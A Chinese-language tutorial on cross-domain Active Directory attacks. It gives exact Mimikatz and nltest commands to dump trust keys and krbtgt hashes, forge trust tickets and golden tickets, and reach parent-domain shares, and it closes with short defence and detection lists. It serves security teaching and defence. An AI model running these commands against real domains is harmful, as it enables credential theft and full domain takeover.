跨域攻击技术详解：域信任密钥与krbtgt散列值利用

一、跨域攻击概述

跨域攻击是内网横向移动的重要手段，主要利用Windows域环境中的信任关系实现权限提升和横向渗透。在MITRE ATT&CK矩阵中，域信任关系发现技术于2019年2月被添加。

主要攻击方法

1. 利用Web漏洞跨域获取权限
2. 利用已知域散列值进行哈希传递攻击或票据传递攻击
3. 利用域信任关系进行跨域攻击

二、利用域信任密钥攻击

1. 信息收集阶段

获取域信任信息：

nltest /domain_trusts

确定目标域控制器：

nltest /dclist:xiyou

2. 提取信任密钥

在子域中执行以下Mimikatz命令：

mimikatz.exe privilege::debug "lsadump::lsa /patch /user:父域名$" "lsadump::trust /patch" exit

或针对特定域（如dayu域）：

mimikatz.exe privilege::debug "lsadump::lsa /patch /user:dayu$" "lsadump::trust /patch" exit

3. 创建信任票据

在子域中新建用户：

net user 用户名 密码 /add

使用Mimikatz创建信任票据：

mimikatz.exe "Kerberos::golden /domain:子域 /sid:当前SID /sids:目标SID-519 /rc4:信任秘钥 /user:任意用户名 /service:krbtgt /target:目标域 /ticket:dayu.kirbi" exit

4. 利用信任票据

获取目标服务的TGS票据：

asktgs.exe dayu.kirbi CIFS/xiyou.dayu.com

导入票据：

kirbikator.exe lsa CIFS.xiyou.dayu.com.kirbi

三、利用krbtgt散列值攻击

1. 获取krbtgt散列值

在域控制器上执行：

mimikatz.exe "privilege::debug" "lsadump::lsa /patch /user:krbtgt" "sekurlsa::krbtgt" exit

2. 构造黄金票据

在子域内的计算机上使用普通用户权限(testyy)构造黄金票据：

mimikatz "kerberos::golden /user:Administrator /domain:目标域 /sid:目标域SID /krbtgt:krbtgt的NTLM哈希 /ticket:golden.kirbi" "kerberos::ptt golden.kirbi" exit

3. 验证权限

访问父域资源验证权限：

\\dayu1.dayu.com\c$

四、防御建议

1. 监控域信任关系变更：定期审计域信任关系，监控异常变更
2. 保护krbtgt账户：定期更换krbtgt账户密码（建议每6个月一次）
3. 限制域管理员权限：避免域管理员账户在非域控机器上使用
4. 启用Kerberos审计：监控异常Kerberos票据请求
5. 实施网络分段：限制域控制器之间的通信
6. 禁用不必要的域信任：移除不再需要的域信任关系

五、检测方法

1. 监控异常票据请求（特别是黄金票据特征）
2. 检查异常域信任关系查询（如nltest命令）
3. 监控LSASS进程的内存转储行为
4. 检测Mimikatz等工具的使用痕迹

通过以上技术细节和防御措施，可以有效防范和检测基于域信任密钥和krbtgt散列值的跨域攻击。